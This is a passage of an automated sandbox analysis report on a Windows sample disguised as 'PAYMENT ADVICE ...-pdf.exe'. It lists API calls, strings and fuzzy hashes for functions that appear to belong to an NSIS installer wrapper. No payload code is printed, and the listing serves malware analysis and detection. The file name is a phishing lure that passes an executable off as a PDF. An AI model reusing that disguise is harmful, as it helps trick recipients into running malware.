                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                • API String ID: 222337774-899692902
                                                                                                                • Opcode ID: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                • Instruction ID: 58c57230207582c12286da0908ad594a16be4941a6f2872b3690da29fc8d014c
                                                                                                                • Opcode Fuzzy Hash: b2f9954a637af8ebec5c0b1a6beb43ebeeb7d59e5d1590defe92d75fa46bc12e
                                                                                                                • Instruction Fuzzy Hash: 01311370600B18BBD2206B219D49F6B3A5CEF45755F14043AB981F62D2EE7CAA01CAAD
                                                                                                                APIs
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                • String ID: @Hmu
                                                                                                                • API String ID: 4216380887-887474944
                                                                                                                • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                                • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                                • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                                APIs
                                                                                                                • CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 0040634C
                                                                                                                • CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 0040635B
                                                                                                                • CharNextW.USER32(0040A300,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406360
                                                                                                                • CharPrevW.USER32(0040A300,0040A300,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00406373
                                                                                                                Strings
                                                                                                                • "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe", xrefs: 0040632D
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004062EA
                                                                                                                • *?|<>/":, xrefs: 0040633B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$Prev
                                                                                                                • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 589700163-3441558323
                                                                                                                • Opcode ID: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                • Instruction ID: f5504631107e1e3793a073f133b65ff293a0897d7111eb10bd5d41781883406d
                                                                                                                • Opcode Fuzzy Hash: beead49ce65fad8369d40c55e1945ba00e1ab41150cab7c26a3550435dbf32aa
                                                                                                                • Instruction Fuzzy Hash: B611C42690061295DB303B558C84AB762F8EF54750F56843FED86B32D0EB7C9CA2C6ED
                                                                                                                APIs
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040419D
                                                                                                                • GetSysColor.USER32(00000000), ref: 004041B9
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 004041C5
                                                                                                                • SetBkMode.GDI32(?,?), ref: 004041D1
                                                                                                                • GetSysColor.USER32(?), ref: 004041E4
                                                                                                                • SetBkColor.GDI32(?,?), ref: 004041F4
                                                                                                                • DeleteObject.GDI32(?), ref: 0040420E
                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 00404218
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2320649405-0
                                                                                                                • Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                • Instruction ID: dec6db0c7b043789455d5ba444b9f0b4b6699da27fefac44a21b5edf9a5b929b
                                                                                                                • Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
                                                                                                                • Instruction Fuzzy Hash: E321C3B1500704ABCB219F68EE08B4BBBF8AF40710F04896DF996F66A0C734E944CB64
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 2531174081-0
                                                                                                                • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                                • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                                • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                                • GetMessagePos.USER32 ref: 00404AA1
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                • String ID: f
                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                                • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                                • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                                • MulDiv.KERNEL32(000708B3,00000064,000708B7), ref: 00402D4D
                                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                                Strings
                                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                                • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                                • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                                APIs
                                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                • String ID: Calibri
                                                                                                                • API String ID: 3808545654-1409258342
                                                                                                                • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                                • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                                • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1780285237-0
                                                                                                                • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                                • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                                • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 2667972263-0
                                                                                                                • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                                • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                                • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsv30DA.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsv30DA.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv30DA.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsv30DA.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsv30DA.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsv30DA.tmp$C:\Users\user\AppData\Local\Temp\nsv30DA.tmp\System.dll
                                                                                                                • API String ID: 3109718747-1254440592
                                                                                                                • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                                • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                                • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2087077646.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2087060697.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087092633.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2087106563.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 2979337801-0
                                                                                                                • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                                • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                                • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1912718029-0
                                                                                                                • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                APIs
